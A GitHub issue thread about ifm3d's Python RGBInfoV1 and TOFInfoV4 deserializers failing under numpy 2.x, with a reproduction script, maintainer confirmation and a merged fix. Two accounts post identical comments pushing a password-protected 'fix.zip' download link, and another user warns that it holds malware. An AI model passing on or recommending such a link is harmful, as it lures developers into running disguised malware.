ifm/ifm3d #462: python RGBInfoV1() and TOFInfoV4() give error using numpy > 2.0.0

micheldom, 2024-08-26:
**Describe the bug**

The deserialize module in Python breaks when using numpy > 2.0.0

`Traceback (most recent call last):
  File "/home/roberto/rtmlib/minimal.py", line 24, in <module>
    rgb_info = RGBInfoV1().deserialize(frame_2d.get_buffer(buffer_id.RGB_INFO))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ifm3dpy.device.Error: Lib: The given Buffer does not contain the expected struct or the data is corrupted.`

The struct and data looked fine compared to another setup I have

**To Reproduce**
Steps to reproduce the behavior. For example:
1. pip install numpy>=2.0.0
2. 
`
from ifm3dpy.device import O3R
from ifm3dpy.framegrabber import FrameGrabber, buffer_id
from ifm3dpy.deserialize import RGBInfoV1, TOFInfoV4

o3r = O3R("192.168.0.69")
fg_2d = FrameGrabber(o3r, 50010)
fg_3d = FrameGrabber(o3r, 50012)
fg_2d.start([buffer_id.RGB_INFO])
fg_3d.start([buffer_id.TOF_INFO])

ok_2d, frame_2d = fg_2d.wait_for_frame().wait_for(150)
ok_3d, frame_3d = fg_3d.wait_for_frame().wait_for(150)

rgb_info = RGBInfoV1().deserialize(frame_2d.get_buffer(buffer_id.RGB_INFO))
tof_info = TOFInfoV4().deserialize(frame_3d.get_buffer(buffer_id.TOF_INFO))
`
2. See error

**Expected behavior**
No error whatsoever, runs with no problems
I have another setup using python 3.8.10 and 1.24.3 which works
I think the problem lies with the numpy version which changed its uint8 api after 2.0.0

**Configuration/Environment (please complete the following information):**
 - OS: Ubuntu 20.04
 -  ifm3d version: 1.5.3
 - using ROS: no

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

BigBoot, 2024-08-26:
:exclamation:  Warning, do not download these links, do not execute the contained software, they contain malware.

lola-masson, 2024-08-27:
Hi @micheldom,

I can confirm that I can reproduce the issue. We are now tracking this internally and will work on providing a fix.

Thanks!

lola-masson, 2024-09-03:
Hey @micheldom, a fix for this has been merged to main. The fix will be included in the next release, or if you want to start testing earlier feel free to build from source.

closed 2024-09-13 by micheldom